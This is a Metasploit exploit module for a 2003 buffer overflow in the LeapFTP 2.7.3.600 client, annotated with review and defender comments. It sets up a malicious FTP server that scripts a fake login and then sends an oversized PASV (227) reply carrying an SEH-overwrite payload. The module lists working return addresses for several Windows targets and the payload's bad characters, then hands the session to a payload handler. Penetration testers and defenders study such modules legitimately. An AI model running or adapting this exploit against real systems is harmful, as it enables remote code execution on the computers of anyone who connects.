Path: blob/master/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Client-side exploit: this module is not an FTP client but a rogue FTP
# *server*. It listens (TcpServer mixin), walks a connecting LeapFTP client
# through a scripted login with canned replies, and answers the client's PASV
# with an oversized "227" reply carrying an SEH overwrite (Seh mixin). The
# vulnerable party is whoever connects; nothing is sent until a client opens
# a session, so from a defender's view the indicator is an FTP server whose
# 227 reply is far longer than the RFC 959 "(h1,h2,h3,h4,p1,p2)" form allows.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Remote::Seh

  # Module metadata and operator options. Points worth knowing when reading on:
  #   * 'BadChars' is the byte set the encoded payload must avoid. The string
  #     "\x00\x0a\x0d\().," expands to NUL, LF, CR, "(", ")", "." and "," -
  #     i.e. the bytes that would terminate the reply line or act as field
  #     delimiters inside the 227 reply the payload is embedded in.
  #   * Each target's 'Ret' is the p/p/r (pop/pop/ret) address named in the
  #     per-target comment; generate_seh_payload below places it in the SEH
  #     record. Target 0 uses an address inside LeapFTP.exe itself (hence
  #     "Universal"); the other two depend on a specific OS DLL build.
  #   * SRVPORT / SRVNAME only shape the listener and the 220 banner text.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600
          client that is triggered through an excessively long PASV reply command. This
          module was ported from the original exploit by drG4njubas with minor improvements.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2003-0558' ],
          [ 'OSVDB', '4587' ],
          [ 'BID', '7860' ],
          [ 'EDB', '54' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\().,",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK.
          [ 'Universal LeapFTP.exe', { 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe
          [ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
          [ 'Windows XP SP0 English', { 'Ret' => 0x7660139c } ], # p/p/r cscdll.dll
        ],
        'Privileged' => false,
        'DisclosureDate' => '2003-06-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
        OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
      ]
    )
  end

  # Runs once per accepted connection: (re)generates the payload for this
  # client, bails out if that fails, and sends the FTP 220 banner built from
  # SRVNAME.
  #
  # NOTE(review): the value bound to `p` is never read, only its nil-ness
  # matters; `return unless regenerate_payload(client)` would say the same
  # without the unused local and the `== nil` comparison. SRVNAME is spliced
  # into the banner unescaped, so a value containing "\r\n" would emit extra
  # reply lines - harmless here because only the operator sets it.
  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
    client.put(buffer)
  end

  # Drives the scripted FTP dialogue. Every client.get_once reads whatever the
  # client sent next and its return value is thrown away: nothing parses the
  # commands, the code simply assumes the client issues them in this fixed
  # order (the canned replies suggest USER, PASS, SYST, REST, REST, PWD, TYPE,
  # PORT, PASV - inferred from the response text, not verified here) and
  # answers each with a hard-coded line.
  #
  # NOTE(review): get_once returns nil when no data arrives (peer gone or read
  # timeout) - confirm against Rex::IO::Stream. None of the calls below check
  # for that, so a client that drops mid-dialogue still has every remaining
  # reply written at it; `return unless client.get_once` at each step would
  # make the abort explicit instead of relying on put() failing later.
  def on_client_data(client)
    client.get_once

    # This could be improved if anyone wants to write a FTP server API.
    user = "331 Please specify the password.\r\n"
    client.put(user)

    client.get_once
    pass = "230 Login successful.\r\n"
    client.put(pass)

    client.get_once
    syst = "215 Windows_NT 5.1\r\n"
    client.put(syst)

    # Two REST replies in a row: presumably the client sends REST twice
    # (first a non-zero, then a zero offset); the same local is reused.
    client.get_once
    rest = "350 Restart position accepted (100).\r\n"
    client.put(rest)

    client.get_once
    rest = "350 Restart position accepted (0).\r\n"
    client.put(rest)

    client.get_once
    pwd = "257 \"/\"\r\n"
    client.put(pwd)

    client.get_once
    type = "200 Switching to ASCII mode.\r\n"
    client.put(type)

    client.get_once
    port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first.
    client.put(port)

    # The trigger. The first "address" field of the 227 reply is 1053 random
    # digits followed by the SEH payload the Seh mixin builds around
    # target.ret, then five one-digit fields so the reply still has the
    # "(a,b,c,d,e,f)" shape. Every byte of the payload must avoid 'BadChars'
    # above, since "(", ")", "," and "." are the delimiters of this very line.
    # A client that bounds each 227 field to a 1-3 digit octet, or a sensor
    # that flags a 227 reply over a few dozen bytes, would catch this.
    client.get_once
    pasv = "227 Entering Passive Mode ("
    pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret)
    pasv << "," + rand_text_numeric(1)
    pasv << "," + rand_text_numeric(1)
    pasv << "," + rand_text_numeric(1)
    pasv << "," + rand_text_numeric(1)
    pasv << "," + rand_text_numeric(1)
    pasv << ")\r\n"

    client.put(pasv)

    # Hand the connection over to the payload handler, then close only this
    # client's socket; the listening service itself is not torn down here.
    handler(client)
    service.close_client(client)
  end
end